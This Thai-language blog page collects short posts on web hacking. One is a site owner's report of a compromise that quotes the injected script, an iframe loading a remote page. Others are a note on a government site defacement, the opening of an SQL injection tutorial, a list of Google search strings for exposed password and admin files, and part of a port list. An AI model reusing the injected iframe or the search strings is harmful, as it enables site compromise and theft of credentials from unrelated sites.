วันนี้อัพเดดรูปมิตติ้งสามประตูแต่พอไปดู validate แล้วดันไม่ผ่าน code มันแปลกๆเลย view code ดูก็เลยเห็นของดีที่ไอ้เลวมันเอามาใส่เว็บส้งติงของใครก็ไม่รู้สคริปที่เขียนก็กระจอก ถอดรหัสได้ว่า
document.write(’<iframe name=4102e551bb src=’
http://stock-stats.info/private_forum/index.php?
‘+Math.round(Math.random()*54905)+’4d51752b’”>’);

stock-stats.info/private_forum/index.php แล้วพอเปิดเข้าไปมันก็บอกว่า ai siktir vee? แปลว่าไรก็ไม่รู้ภาษารัสเซียมั้งครับ ใครรู้ช่วยบอกหน่อยครับว่าแปลว่าไรพอดีเปิดเข้าไปมันบอกว่าแบบนี้น่าจะมีความหมายเดียวกะ Fuck off! มั้งครับพอดีเพื่อนของเพื่อนเค้าแปลให้อิอิ เข้าไปโดนมันหลอกด่าอีกเวงจริงๆ ตอนนี้ก็ไม่รู้มันเข้ามาทางไหนแต่ที่รู้ๆมันไปแก้ไฟล์ /blog/htdocs/wp-content/index.php สคริปที่เอาไปใส่ก็ประมาณนี้ครับ
Popularity: 7% [?]

Popularity: 7% [?]

If you enjoy our post, feel free to subscribes to our rss feeds

กระทรวง ICT โดน hACk

คลิ้กเพื่อดูรูปใหญ่
แป๊บเดียวลงข่าวซ่ะแล้วสงสัยออกกฏมากเกินไปเลยโดนเองซ่ะเลย โดน hack ไปประมาณตอนห้าโมงเช้าครับหน้าเว็บนั้นเป็นการเชียร์ทักษิณแล้วมีถ้อยคำประมาณว่า เอาเผด็จการของพวกมึงคืนไป เอาประเทศไทยของกูคืนมา
Popularity: 10% [?]

Popularity: 10% [?]

If you enjoy our post, feel free to subscribes to our rss feeds

บทความต่อไปนี้พยายามที่จะช่วยให้ผู้เริ่มต้นที่กำลังเผชิญกับปัญหาเกี่ยวกับการใช้ SQL Injection เพื่อให้เกิด
ประโยชน์ และเพื่อป้องกันการโจมตีจากเทคนิคนี้
รายละเอียด
1.0 นำกันก่อนนะ
?เมื่อระบบเปิดเฉพาะ port 80 คงไม่ต้องมานั่งเสียเวลาให้เปล่าในการควานหาช่องโหว่ เพราะผู้ดูแลระบบก็
คงอุดช่องโหว่ไว้แล้ว ดังนั้นวิธีเดียวคือแฮกผ่านเวปซะเลย SQL injection คือหนทางนึงของการ Hack web ซึ่งไม่ต้อง
การอะไรนอกจาก port 80 วิธีนี้จะโจมตี web application (เช่น ASP, JSP, PHP, CGI, etc) มากกว่าที่จะเป็น
การโจมตีเครื่อง server หรือ services ที่รันบนระบบปฏิบัติการ
บทความนี้ไม่ได้นำเสนอสิ่งใหม่ SQL Injection ถูกเปิดเผยและใช้กันอย่างกว้างขวาง เราเขียนบทความนี้
เพราะเราต้องการบันทึกการใช้ SQL Injection ไว้เป็นเอกสาร และหวังว่าส่วนหนึ่งของมันจะเป็นประโยชน์กับผู้อื่น คุณ
สามารถหาข้อมูลเพิ่มเติมได้ในหัวข้อ “9.0 ข้อมูลเพิ่มเติม” (ขี้เกียจแปลสรุปเลย)
Popularity: 20% [?]

Popularity: 20% [?]

If you enjoy our post, feel free to subscribes to our rss feeds

google hack
google ใช้ในทางดีมันก็ดีมีข้อมูลให้เราตามต้องการหากใช้ในทางที่ไม่ดีมันก็ตอบสนองเราเหมือนกัน เพราะว่า google มันไม่สามารถแยกออกว่าเค้าเอาข้อมูลไปทำสิ่งที่ดีไม่ดี มันบอกว่าเอาอะไรมาใส่ก็เจอ อิอิ งั้นเราไปเล่นกันขำๆ เว็บไหนค้นหาเจอก็คิดว่าเป็นเว็บเอาไว้ศึกษาแล้วกันนะครับ
SEARCH PATHS :
“Index of /admin”
“Index of /password”
“Index of /mail”
“Index of /” +passwd
“Index of /” +password.txt
“Index of /” +.htaccess
index of ftp +.mdb allinurl:/cgi-bin/ +mailto
Popularity: 40% [?]

Popularity: 40% [?]

If you enjoy our post, feel free to subscribes to our rss feeds

หมายเลข port และ service การทำงาน
0/tcp Reserved
0/udp Reserved
1/tcp TCP Port Service Multiplexer
2/tcp Management Utility
3/tcp Compression Process
5/tcp Remote Job Entry
7/tcp Echo
7/udp Echo
9/tcp Discard
9/udp Discard
11/tcp Active Users
11/udp Active Users
13/tcp Daytime
13/udp Daytime
17/tcp Quote of the Day
17/udp Quote of the Day
Popularity: 9% [?]

Popularity: 9% [?]

If you enjoy our post, feel free to subscribes to our rss feeds